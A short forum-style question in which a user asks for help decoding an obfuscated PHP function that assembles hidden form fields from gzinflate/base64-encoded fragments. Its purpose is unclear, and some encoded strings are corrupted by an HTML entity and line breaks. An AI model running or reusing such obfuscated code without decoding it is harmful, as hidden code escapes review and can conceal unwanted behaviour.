I try to decode this line. Been searching all over google. most of the sample include "eval" in the srting. but not in mine.
CODE
function get_code($fields, $files ,$next_page, $protect_name){
$str = "echo \"";
foreach($fields as $value){
$str .= gzinflate(base64_decode("s8nMKygtUSipLEi1jVHKyExJSc2LUVLIS8wF8QE=")).base64_decode($value).gzinflate(base64_decode("i1FSKEvMKU21jVFS0ssoyc0pLkhNzkzMSc5ILCrWUIkHSxZHKwEA")).base64_decode($value).gzinflate(base64_decode("U4rV1FOKUbIDAA=="));
}
foreach($files as $value){
$str .= gzinflate(base64_decode("s8nMKygtUSipLEi1jVHKyExJSc2LUVLIS8wF8QE=")).base64_decode($value).gzinflate(base64_decode("iy9KTczRzUvMTY1RUihLzClNtY1RUtLLKMnNKS5ITc5MzEnOSCwq1lCJB0sWRysBAA==")).base64_decode($value).gzinflate(base64_decode("iy9KTczRzUvMTVWK1dRTilGyAwA="));
}
$str .= gzinflate(base64_decode(& #34;s8nMKygtUSipLEi1jVHKyExJSc2LUVLIS8wF8eOLUtNSi1KLgCJliTmlICEVhJidDX7NeakVJfEF
iempSNoB")).base64_decode($next_page).gzinflate(base64_decode("i1GysylQSM5JLC62jVFKyy/KjU+tKEgtKokvLqnMSY0BSmfmFZSWKOQl5qYCVQAA")).base64_decode($protect_name).gzinflate(base64_decode("i1FSKKksSLWNUSpJrSiJUVIoS8wpBXFjlPTtbPQL7AA=")).gzinflate(base64_decode("sylOLsosKFEoqSxItY1RKkmtKNHPSixLhAjHKNnZKOrqAgA="))."\n\r".gzinflate(base64_decode("VY1bDoMgEEW3QvhXrA/QWrsSEkORAMYKkWmtuy+NTWP/bs6cO1c7pyfVi6GXk1UzoA5x7B+3hFXl6cRYXlKW1UXdcNwi/ ZPD5Ha1YE3Fsjwv6L+w2gFMNEpaH7FRVptPk2YtIiRJruhCglysh5j2gGDzquMY1AvIKJ5ixxyjsMjID
YA/E+KFVmLI0/152ObBSgHWzal09++VBOPWuBvSMXB82HoD"));
$str .= "\";";
return $str;
}